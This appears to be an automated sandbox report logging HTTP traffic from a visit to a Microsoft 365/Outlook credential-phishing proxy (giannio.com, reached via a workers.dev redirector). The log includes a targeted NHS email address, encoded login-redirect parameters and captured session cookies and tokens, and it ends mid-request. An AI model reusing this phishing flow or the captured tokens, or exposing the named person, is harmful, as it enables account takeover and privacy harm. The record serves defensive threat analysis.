Source: global traffic	HTTP traffic detected: GET /cdn-cgi/challenge-platform/h/b/i/901eeac43f625e71/1736871247206/f37lvsh0JO71dIb HTTP/1.1Host: challenges.cloudflare.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: /Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /cdn-cgi/challenge-platform/h/b/pat/901eeac43f625e71/1736871247210/832e6f88d1391a6975fd6cb5fd5347520ecae1ae5764196675434841ba204c32/ZwHl9XpXvybvOls HTTP/1.1Host: challenges.cloudflare.comConnection: keep-aliveCache-Control: max-age=0sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: /Sec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/turnstile/if/ov2/av0/rcv/z7irz/0x4AAAAAAA4tBTMXY0JFkmlC/auto/fbE/normal/auto/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /cdn-cgi/challenge-platform/h/b/flow/ov1/427550357:1736867636:Hrl0drLFPAO-Ioo5MdhbNq5JwydQFL51g-oXKOylUNU/901eeac43f625e71/wivrWOqgzMaSNvT90f5ud0goLwhNn4dJ1uoC04MkNso-1736871245-1.1.1.1-zygmDrQxBhbZIvDYFOJlI2b..poU6XvxCfcufR43J.N.teb5vickgSAhTQDFz74X HTTP/1.1Host: challenges.cloudflare.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: /Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /cdn-cgi/challenge-platform/h/b/flow/ov1/427550357:1736867636:Hrl0drLFPAO-Ioo5MdhbNq5JwydQFL51g-oXKOylUNU/901eeac43f625e71/wivrWOqgzMaSNvT90f5ud0goLwhNn4dJ1uoC04MkNso-1736871245-1.1.1.1-zygmDrQxBhbZIvDYFOJlI2b..poU6XvxCfcufR43J.N.teb5vickgSAhTQDFz74X HTTP/1.1Host: challenges.cloudflare.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: /Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /?ekpjrgyb&qrc=adrianmarsh@nhs.net HTTP/1.1Host: bas-co.ukConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"accept: application/jsonqrc-auth: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Origin: https://5eedab40.shaullerica.workers.devSec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://5eedab40.shaullerica.workers.dev/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /?dataXX0=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJ1cmwiOiJodHRwczovL2dpYW5uaW8uY29tLyIsImRvbWFpbiI6ImdpYW5uaW8uY29tIiwia2V5IjoiaEZOMTFNS0dDSFpzIiwicXJjIjoiYWRyaWFubWFyc2hAbmhzLm5ldCIsImlhdCI6MTczNjg3MTI2MCwiZXhwIjoxNzM2ODcxMzgwfQ.paqwP-ugkt_U78GOlPQHscluhYutvgpoUiV-DeuQCD8 HTTP/1.1Host: giannio.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: cross-siteSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentReferer: https://5eedab40.shaullerica.workers.dev/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /?ekpjrgyb&qrc=adrianmarsh@nhs.net HTTP/1.1Host: bas-co.ukConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: /Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /?qrc=adrianmarsh%40nhs.net HTTP/1.1Host: giannio.comConnection: keep-aliveUpgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: cross-siteSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentsec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Referer: https://5eedab40.shaullerica.workers.dev/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: qPdM=hFN11MKGCHZs; qPdM.sig=kLeeELDLsoVcQ3j4mxqYtjIGLpY
Source: global traffic	HTTP traffic detected: GET /?ekpjrgyb=c25456288a8a7517ca93e4a8f97f07e8ffdea4eee4fb00b0f1c081248990b79182ec9add4905e2a5a774c409eb37322dc2e2a3426df6098843e2cef1e62f150d&qrc=adrianmarsh%40nhs.net HTTP/1.1Host: bas-co.ukConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: /Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: qPdM=LbC8L2vWm8kx; qPdM.sig=FwhKLrv6OnWENxuBca-TJ7eMU7Y
Source: global traffic	HTTP traffic detected: GET /owa/?login_hint=adrianmarsh%40nhs.net HTTP/1.1Host: giannio.comConnection: keep-aliveUpgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: cross-siteSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentsec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Referer: https://5eedab40.shaullerica.workers.dev/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: qPdM=hFN11MKGCHZs; qPdM.sig=kLeeELDLsoVcQ3j4mxqYtjIGLpY
Source: global traffic	HTTP traffic detected: GET /?phzt1wdp9=aHR0cHM6Ly9sb2dpbi5taWNyb3NvZnRvbmxpbmUuY29tL2NvbW1vbi9vYXV0aDIvYXV0aG9yaXplP2NsaWVudF9pZD0wMDAwMDAwMi0wMDAwLTBmZjEtY2UwMC0wMDAwMDAwMDAwMDAmcmVkaXJlY3RfdXJpPWh0dHBzJTNhJTJmJTJmb3V0bG9vay5vZmZpY2UuY29tJTJmb3dhJTJmJnJlc291cmNlPTAwMDAwMDAyLTAwMDAtMGZmMS1jZTAwLTAwMDAwMDAwMDAwMCZyZXNwb25zZV9tb2RlPWZvcm1fcG9zdCZyZXNwb25zZV90eXBlPWNvZGUraWRfdG9rZW4mc2NvcGU9b3BlbmlkJm1zYWZlZD0xJm1zYXJlZGlyPTEmbG9naW5faGludD1hZHJpYW5tYXJzaCU0MG5ocy5uZXQmY2xpZW50LXJlcXVlc3QtaWQ9N2VhZGM3MTktYzRiYy1jN2MzLTYwMDMtODY5NzE1YWU0ZjU2JnByb3RlY3RlZHRva2VuPXRydWUmY2xhaW1zPSU3YiUyMmlkX3Rva2VuJTIyJTNhJTdiJTIyeG1zX2NjJTIyJTNhJTdiJTIydmFsdWVzJTIyJTNhJTViJTIyQ1AxJTIyJTVkJTdkJTdkJTdkJm5vbmNlPTYzODcyNDY4MDYyNTQ4ODUwOC5mZDBmOTE1ZC01Y2IwLTQ2MjYtOTI2My1mMGE5NDFkYmI2ZTQmc3RhdGU9RGN0QkRvTWdFRUJSYU1fUzd0QVJoM0ZZTkI3RkRFVUtpY1ZFVFhyOXNuaF85N1ZTNnQ3Y0dnMHRhcUtSSjR2RVFOWWhzd1B1VW9Ua0J4ZU5ld2N3U0phTXR6U2FCT0p4aUNIUWlycTl6MzdfU1Q5di02ZlVKWmQ2dlNRZVJlcFhqak1fRUdvLXU3cGVmdw== HTTP/1.1Host: giannio.comConnection: keep-aliveUpgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: cross-siteSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentsec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Referer: https://5eedab40.shaullerica.workers.dev/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: qPdM=hFN11MKGCHZs; qPdM.sig=kLeeELDLsoVcQ3j4mxqYtjIGLpY; ClientId=6D041578E8394D49BCAE840660191B27; OIDC=1; OpenIdConnect.nonce.v3.Wj9aGN8jRqQPBEpjiC9thrSpO5GWE7W0H04b1p4VQII=638724680625488508.fd0f915d-5cb0-4626-9263-f0a941dbb6e4; X-OWA-RedirectHistory=ArLym14BqGT3gbY03Qg
Source: global traffic	HTTP traffic detected: GET /aadcdn.msauth.net/~/shared/1.0/content/js/BssoInterrupt_Core_zKox_QMcTIVut7mG_Z9Eew2.js HTTP/1.1Host: giannio.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: /Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://giannio.com/?phzt1wdp9=aHR0cHM6Ly9sb2dpbi5taWNyb3NvZnRvbmxpbmUuY29tL2NvbW1vbi9vYXV0aDIvYXV0aG9yaXplP2NsaWVudF9pZD0wMDAwMDAwMi0wMDAwLTBmZjEtY2UwMC0wMDAwMDAwMDAwMDAmcmVkaXJlY3RfdXJpPWh0dHBzJTNhJTJmJTJmb3V0bG9vay5vZmZpY2UuY29tJTJmb3dhJTJmJnJlc291cmNlPTAwMDAwMDAyLTAwMDAtMGZmMS1jZTAwLTAwMDAwMDAwMDAwMCZyZXNwb25zZV9tb2RlPWZvcm1fcG9zdCZyZXNwb25zZV90eXBlPWNvZGUraWRfdG9rZW4mc2NvcGU9b3BlbmlkJm1zYWZlZD0xJm1zYXJlZGlyPTEmbG9naW5faGludD1hZHJpYW5tYXJzaCU0MG5ocy5uZXQmY2xpZW50LXJlcXVlc3QtaWQ9N2VhZGM3MTktYzRiYy1jN2MzLTYwMDMtODY5NzE1YWU0ZjU2JnByb3RlY3RlZHRva2VuPXRydWUmY2xhaW1zPSU3YiUyMmlkX3Rva2VuJTIyJTNhJTdiJTIyeG1zX2NjJTIyJTNhJTdiJTIydmFsdWVzJTIyJTNhJTViJTIyQ1AxJTIyJTVkJTdkJTdkJTdkJm5vbmNlPTYzODcyNDY4MDYyNTQ4ODUwOC5mZDBmOTE1ZC01Y2IwLTQ2MjYtOTI2My1mMGE5NDFkYmI2ZTQmc3RhdGU9RGN0QkRvTWdFRUJSYU1fUzd0QVJoM0ZZTkI3RkRFVUtpY1ZFVFhyOXNuaF85N1ZTNnQ3Y0dnMHRhcUtSSjR2RVFOWWhzd1B1VW9Ua0J4ZU5ld2N3U0phTXR6U2FCT0p4aUNIUWlycTl6MzdfU1Q5di02ZlVKWmQ2dlNRZVJlcFhqak1fRUdvLXU3cGVmdw==Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: qPdM=hFN11MKGCHZs; qPdM.sig=kLeeELDLsoVcQ3j4mxqYtjIGLpY; ClientId=6D041578E8394D49BCAE840660191B27; OIDC=1; OpenIdConnect.nonce.v3.Wj9aGN8jRqQPBEpjiC9thrSpO5GWE7W0H04b1p4VQII=638724680625488508.fd0f915d-5cb0-4626-9263-f0a941dbb6e4; X-OWA-RedirectHistory=ArLym14BqGT3gbY03Qg; esctx-EYYo7bTJmw=AQABCQEAAADW6jl31mB3T7ugrWTT8pFeJpAwmJuhY6fIh76LMdEGkXD34bp6Rut4iwBF6BX79VVNGev-TmPmsvtxXfMlTgzS9yZ9N831OCl95SJF6pO_XGa0SwajFb8hPgCPLygrVgDgMIdNTFJqYNhKjRuQIeOx0FTXALYZ1eMOWYAS94P1-CAA; fpc=Aigy6MsT76xAmzN3plwdK4c; esctx=PAQABBwEAAADW6jl31mB3T7ugrWTT8pFegi7USDB8ft-k1JNq7kl52zenHxg0Yjwe9nUft6bN9IpDtp32I-F-IxUHU4T8KfGzDaBetLD8jeYB7_HP5FJ_AU6VJe_ewS5WXr-jB7hryNeCRQ4uw3EF7CyZXDM9HuAv9maF_z_B28F18RwyS7iBub8wrdshjzDCuiae8sKOnosgAA; x-ms-gateway-slice=estsfd; stsservicecookie=estsfd
Source: global traffic	HTTP traffic detected: GET /aadcdn.msauth.net/~/shared/1.0/content/js/BssoInterrupt_Core_zKox_QMcTIVut7mG_Z9Eew2.js HTTP/1.1Host: giannio.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: /Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: qPdM=hFN11MKGCHZs; qPdM.sig=kLeeELDLsoVcQ3j4mxqYtjIGLpY; ClientId=6D041578E8394D49BCAE840660191B27; OIDC=1; OpenIdConnect.nonce.v3.Wj9aGN8jRqQPBEpjiC9thrSpO5GWE7W0H04b1p4VQII=638724680625488508.fd0f915d-5cb0-4626-9263-f0a941dbb6e4; X-OWA-RedirectHistory=ArLym14BqGT3gbY03Qg; esctx-EYYo7bTJmw=AQABCQEAAADW6jl31mB3T7ugrWTT8pFeJpAwmJuhY6fIh76LMdEGkXD34bp6Rut4iwBF6BX79VVNGev-TmPmsvtxXfMlTgzS9yZ9N831OCl95SJF6pO_XGa0SwajFb8hPgCPLygrVgDgMIdNTFJqYNhKjRuQIeOx0FTXALYZ1eMOWYAS94P1-CAA; fpc=Aigy6MsT76xAmzN3plwdK4c; esctx=PAQABBwEAAADW6jl31mB3T7ugrWTT8pFegi7USDB8ft-k1JNq7kl52zenHxg0Yjwe9nUft6bN9IpDtp32I-F-IxUHU4T8KfGzDaBetLD8jeYB7_HP5FJ_AU6VJe_ewS5WXr-jB7hryNeCRQ4uw3EF7CyZXDM9HuAv9maF_z_B28F18RwyS7iBub8wrdshjzDCuiae8sKOnosgAA; x-ms-gateway-slice=estsfd; stsservicecookie=estsfd
Source: global traffic	HTTP traffic detected: GET /?phzt1wdp9=aHR0cHM6Ly9sb2dpbi5taWNyb3NvZnRvbmxpbmUuY29tL2NvbW1vbi9vYXV0aDIvYXV0aG9yaXplP2NsaWVudF9pZD0wMDAwMDAwMi0wMDAwLTBmZjEtY2UwMC0wMDAwMDAwMDAwMDAmcmVkaXJlY3RfdXJpPWh0dHBzJTNhJTJmJTJmb3V0bG9vay5vZmZpY2UuY29tJTJmb3dhJTJmJnJlc291cmNlPTAwMDAwMDAyLTAwMDAtMGZmMS1jZTAwLTAwMDAwMDAwMDAwMCZyZXNwb25zZV9tb2RlPWZvcm1fcG9zdCZyZXNwb25zZV90eXBlPWNvZGUraWRfdG9rZW4mc2NvcGU9b3BlbmlkJm1zYWZlZD0xJm1zYXJlZGlyPTEmbG9naW5faGludD1hZHJpYW5tYXJzaCU0MG5ocy5uZXQmY2xpZW50LXJlcXVlc3QtaWQ9N2VhZGM3MTktYzRiYy1jN2MzLTYwMDMtODY5NzE1YWU0ZjU2JnByb3RlY3RlZHRva2VuPXRydWUmY2xhaW1zPSU3YiUyMmlkX3Rva2VuJTIyJTNhJTdiJTIyeG1zX2NjJTIyJTNhJTdiJTIydmFsdWVzJTIyJTNhJTViJTIyQ1AxJTIyJTVkJTdkJTdkJTdkJm5vbmNlPTYzODcyNDY4MDYyNTQ4ODUwOC5mZDBmOTE1ZC01Y2IwLTQ2MjYtOTI2My1mMGE5NDFkYmI2ZTQmc3RhdGU9RGN0QkRvTWdFRUJSYU1fUzd0QVJoM0ZZTkI3RkRFVUtpY1ZFVFhyOXNuaF85N1ZTNnQ3Y0dnMHRhcUtSSjR2RVFOWWhzd1B1VW9Ua0J4ZU5ld2N3U0phTXR6U2FCT0p4aUNIUWlycTl6MzdfU1Q5di02ZlVKWmQ2dlNRZVJlcFhqak1fRUdvLXU3cGVmdw==&sso_reload=true HTTP/1.1Host: giannio.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: same-originSec-Fetch-Mode: navigateSec-Fetch-Dest: documentReferer: https://giannio.com/?phzt1wdp9=aHR0cHM6Ly9sb2dpbi5taWNyb3NvZnRvbmxpbmUuY29tL2NvbW1vbi9vYXV0aDIvYXV0aG9yaXplP2NsaWVudF9pZD0wMDAwMDAwMi0wMDAwLTBmZjEtY2UwMC0wMDAwMDAwMDAwMDAmcmVkaXJlY3RfdXJpPWh0dHBzJTNhJTJmJTJmb3V0bG9vay5vZmZpY2UuY29tJTJmb3dhJTJmJnJlc291cmNlPTAwMDAwMDAyLTAwMDAtMGZmMS1jZTAwLTAwMDAwMDAwMDAwMCZyZXNwb25zZV9tb2RlPWZvcm1fcG9zdCZyZXNwb25zZV90eXBlPWNvZGUraWRfdG9rZW4mc2NvcGU9b3BlbmlkJm1zYWZlZD0xJm1zYXJlZGlyPTEmbG9naW5faGludD1hZHJpYW5tYXJzaCU0MG5ocy5uZXQmY2xpZW50LXJlcXVlc3QtaWQ9N2VhZGM3MTktYzRiYy1jN2MzLTYwMDMtODY5NzE1YWU0ZjU2JnByb3RlY3RlZHRva2VuPXRydWUmY2xhaW1zPSU3YiUyMmlkX3Rva2VuJTIyJTNhJTdiJTIyeG1zX2NjJTIyJTNhJTdiJTIydmFsdWVzJTIyJTNhJTViJTIyQ1AxJTIyJTVkJTdkJTdkJTdkJm5vbmNlPTYzODcyNDY4MDYyNTQ4ODUwOC5mZDBmOTE1ZC01Y2IwLTQ2MjYtOTI2My1mMGE5NDFkYmI2ZTQmc3RhdGU9RGN0QkRvTWdFRUJSYU1fUzd0QVJoM0ZZTkI3RkRFVUtpY1ZFVFhyOXNuaF85N1ZTNnQ3Y0dnMHRhcUtSSjR2RVFOWWhzd1B1VW9Ua0J4ZU5ld2N3U0phTXR6U2FCT0p4aUNIUWlycTl6MzdfU1Q5di02ZlVKWmQ2dlNRZVJlcFhqak1fRUdvLXU3cGVmdw==Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: qPdM=hFN11MKGCHZs; qPdM.sig=kLeeELDLsoVcQ3j4mxqYtjIGLpY; ClientId=6D041578E8394D49BCAE840660191B27; OIDC=1; OpenIdConnect.nonce.v3.Wj9aGN8jRqQPBEpjiC9thrSpO5GWE7W0H04b1p4VQII=638724680625488508.fd0f915d-5cb0-4626-9263-f0a941dbb6e4; X-OWA-RedirectHistory=ArLym14BqGT3gbY03Qg; esctx-EYYo7bTJmw=AQABCQEAAADW6jl31mB3T7ugrWTT8pFeJpAwmJuhY6fIh76LMdEGkXD34bp6Rut4iwBF6BX79VVNGev-TmPmsvtxXfMlTgzS9yZ9N831OCl95SJF6pO_XGa0SwajFb8h
Source: global traffic	HTTP traffic detected: GET /favicon.ico HTTP/1.1Host: giannio.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/,/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://giannio.com/?phzt1wdp9=aHR0cHM6Ly9sb2dpbi5taWNyb3NvZnRvbmxpbmUuY29tL2NvbW1vbi9vYXV0aDIvYXV0aG9yaXplP2NsaWVudF9pZD0wMDAwMDAwMi0wMDAwLTBmZjEtY2UwMC0wMDAwMDAwMDAwMDAmcmVkaXJlY3RfdXJpPWh0dHBzJTNhJTJmJTJmb3V0bG9vay5vZmZpY2UuY29tJTJmb3dhJTJmJnJlc291cmNlPTAwMDAwMDAyLTAwMDAtMGZmMS1jZTAwLTAwMDAwMDAwMDAwMCZyZXNwb25zZV9tb2RlPWZvcm1fcG9zdCZyZXNwb25zZV90eXBlPWNvZGUraWRfdG9rZW4mc2NvcGU9b3BlbmlkJm1zYWZlZD0xJm1zYXJlZGlyPTEmbG9naW5faGludD1hZHJpYW5tYXJzaCU0MG5ocy5uZXQmY2xpZW50LXJlcXVlc3QtaWQ9N2VhZGM3MTktYzRiYy1jN2MzLTYwMDMtODY5NzE1YWU0ZjU2JnByb3RlY3RlZHRva2VuPXRydWUmY2xhaW1zPSU3YiUyMmlkX3Rva2VuJTIyJTNhJTdiJTIyeG1zX2NjJTIyJTNhJTdiJTIydmFsdWVzJTIyJTNhJTViJTIyQ1AxJTIyJTVkJTdkJTdkJTdkJm5vbmNlPTYzODcyNDY4MDYyNTQ4ODUwOC5mZDBmOTE1ZC01Y2IwLTQ2MjYtOTI2My1mMGE5NDFkYmI2ZTQmc3RhdGU9RGN0QkRvTWdFRUJSYU1fUzd0QVJoM0ZZTkI3RkRFVUtpY1ZFVFhyOXNuaF85N1ZTNnQ3Y0dnMHRhcUtSSjR2RVFOWWhzd1B1VW9Ua0J4ZU5ld2N3U0phTXR6U2FCT0p4aUNIUWlycTl6MzdfU1Q5di02ZlVKWmQ2dlNRZVJlcFhqak1fRUdvLXU3cGVmdw==Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: qPdM=hFN11MKGCHZs; qPdM.sig=kLeeELDLsoVcQ3j4mxqYtjIGLpY; ClientId=6D041578E8394D49BCAE840660191B27; OIDC=1; OpenIdConnect.nonce.v3.Wj9aGN8jRqQPBEpjiC9thrSpO5GWE7W0H04b1p4VQII=638724680625488508.fd0f915d-5cb0-4626-9263-f0a941dbb6e4; X-OWA-RedirectHistory=ArLym14BqGT3gbY03Qg; esctx-EYYo7bTJmw=AQABCQEAAADW6jl31mB3T7ugrWTT8pFeJpAwmJuhY6fIh76LMdEGkXD34bp6Rut4iwBF6BX79VVNGev-TmPmsvtxXfMlTgzS9yZ9N831OCl95SJF6pO_XGa0SwajFb8hPgCPLygrVgDgMIdNTFJqYNhKjRuQIeOx0FTXALYZ1eMOWYAS94P1-CAA; fpc=Aigy6MsT76xAmzN3plwdK4c; esctx=PAQABBwEAAADW6jl31mB3T7ugrWTT8pFegi7USDB8ft-k1JNq7kl52zenHxg0Yjwe9nUft6bN9IpDtp32I-F-IxUHU4T8KfGzDaBetLD8jeYB7_HP5FJ_AU6VJe_ewS5WXr-jB7hryNeCRQ4uw3EF7CyZXDM9HuAv9maF_z_B28F18RwyS7iBub8wrdshjzDCuiae8sKOnosgAA; x-ms-gateway-slice=estsfd; stsservicecookie=estsfd; AADSSO=NA\|NoExtension; SSOCOOKIEPULLED=1
Source: global traffic	HTTP traffic detected: GET /?phzt1wdp9=aHR0cHM6Ly9mcy5uaHMubmV0L2FkZnMvbHMvP2xvZ2luX2hpbnQ9YWRyaWFubWFyc2glNDBuaHMubmV0JmNsaWVudC1yZXF1ZXN0LWlkPTdlYWRjNzE5LWM0YmMtYzdjMy02MDAzLTg2OTcxNWFlNGY1NiZ1c2VybmFtZT1hZHJpYW5tYXJzaCU0MG5ocy5uZXQmd2E9d3NpZ25pbjEuMCZ3dHJlYWxtPXVybiUzYWZlZGVyYXRpb24lM2FNaWNyb3NvZnRPbmxpbmUmd2N0eD1lc3RzcmVkaXJlY3QlM2QyJTI2ZXN0c3JlcXVlc3QlM2RyUVFJQVJBQWpaRk5hTk5nQUliek5WMXM2OVF5RVJRRUpYb2FwTTFmazZhZ3VLN2RabWZYcmRuS1dwR1lmdm5TWkczemRVbjZ3OFk4aWlESThLRGdSZlE0VUdRWFpYZ1FGQWFEUWNfenN1UHdJTHJUVG1LTEYyXzZIbDZlMDN0NDNuR1NpM0dwNi15ZjhNeXdHZFkwT1FhaUlmMFZkeXdTdmJUNzVzSEhMNTkzNzVNUG4xOTRXeWh0Z1N1Vzc3ZThWRHlPMjM0RDQzb01tNllOVVF6aVpoeDM5ZmdIQVBvQUhBSHdOSEJlTjF4YmQ1cTY2MW0zSE11TE9jamZDc2lTa0pSNVVVcXlFcDhRazhrRW00eVpCbXNxWE1KZ0VyREtNcUxFUzR6Q1N3Smpzcm9pY2thMUtpSHhJSEN1TU5IMkxYNVkyTFhYMEhFZ2JHSzNxYld3NTc4Z240QU05Tk1abks5bHMtbWludGRVMlo4b1dzSlVlUzR0VDJXeVM3TTJMR1VYbDEzRmN5eE5rVXVxNU10d3VzYjYtdXBzTVNkMnNndHpaY3ZyenJlWDhHSTkzVU56cUF1N2FrN1AtMnVxbmk3a2V2Ymt6SUx0cmlwcmdxeXBpMHFIa2N5bFhNV1FPdW9DS3FMVzhzcEtYc3RPWTZZdHQ1RFozU0xfeV9JMlNRM1VOYkd6UjFLNGhSemI2QWZCWVJCOEM0NnlaQ29VaWtTSmk4UlY0aVFJWG84TURxR3ZWWS1fX255ZjIxWXVsMWR2UW1KdkpGNHJDd1g1ZGhFS3JsTjI3ZEtkSXB4cGVMeVRpYmNhYXR1c1ZCSjJkejVoSWxjb2VUZVVGTGRKZ1UySzJxSENJVEpLME9Ua1BIZEVnUjhVZUhTSzJBbl82OTMtYVhBd0trWW8yTkR0cGpjMnZrN2JodWJqT25MbzFEcmRhM29haEVQcTZJMDI4dWpVWFhxd1Q5X2IyTmo0ZElZNE9mdjQxNnVYUjhfMnY4LThpeEtIVWVJMzAj HTTP/1.1Host: giannio.comConnection: keep-aliveUpgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: same-originSec-Fetch-Mode: navigateSec-Fetch-Dest: documentsec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Referer: 